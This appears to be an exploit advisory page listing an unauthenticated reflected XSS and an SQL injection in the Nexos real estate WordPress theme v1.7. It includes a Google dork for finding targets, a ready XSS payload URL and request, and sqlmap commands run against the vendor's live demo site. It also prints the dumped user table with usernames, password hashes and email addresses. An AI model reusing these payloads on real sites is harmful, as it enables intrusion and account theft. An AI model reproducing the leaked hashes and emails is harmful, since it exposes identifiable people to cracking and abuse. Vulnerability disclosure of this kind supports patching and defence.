Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities

2020.06.29
Risk: Medium
Local: No
Remote: Yes

[+] Exploit Title: Nexos - Real Estate WordPress Theme v1.7 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/nexos/ [+] Date: 2020-06-17 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] [+] Software Version: 1.7 [+] Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 [+] Tested on: Debian 10 [+] CVE: CVE-2020-15363, CVE-2020-15364 [+] CWE: CWE-79, CWE-89 ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] https://listing-themes.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /nexos-wp/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="https://listing-themes.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: geniuscr_nexos Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+ | user_login | user_pass | user_email | +--------------+------------------------------------+-------------------------+ | user | $P$B0eez6Fan0emMx31I/k5F.uza48xWy. | test5@geniuscript.com | | admin | $P$B0k0ctLBFFLhNs.T8hH6LYKoTBcb2R/ | sandi@winter.hr | | ketysprings | $P$BdVhMq2W0.buAwSgzcUVG5rvEKwuYm/ | kety@listing-themes.com | | amt_listing | $P$BFlTaGkDr2Ah1HLbDqGG7qC4DPU74A/ | amt@listing-themes.com | | agent | $P$Blz1idk4HqnH69A373ZGq1R27LEoFm1 | pero@listing-themes.com | | wodo_listing | $P$BnpfrXvakrRL.SevusOcHg2QBpzAYZ0 | wodo@listing-themes.com | | tonystark | $P$BpnHKXT/haUdZSaJ.Bw9LYwqL2KIUS0 | tony@listing-themes.com | | alenwinter | $P$BVvVELeLL0BQoGmksEuHziez.uJN49. | alen@listing-themes.com | | ezf_listing | $P$BZC7jVDUafAaF.aQb.GQ05TQcfuRzE. | ezf@listing-themes.com | +--------------+------------------------------------+-------------------------+ ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
https://raw.githubusercontent.com/vladvector/vladvector.github.io/master/exploit/2020-06-17-nexos-real-estate-wordpress-theme-v1-7.txt
https://twitter.com/vlad_vector


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top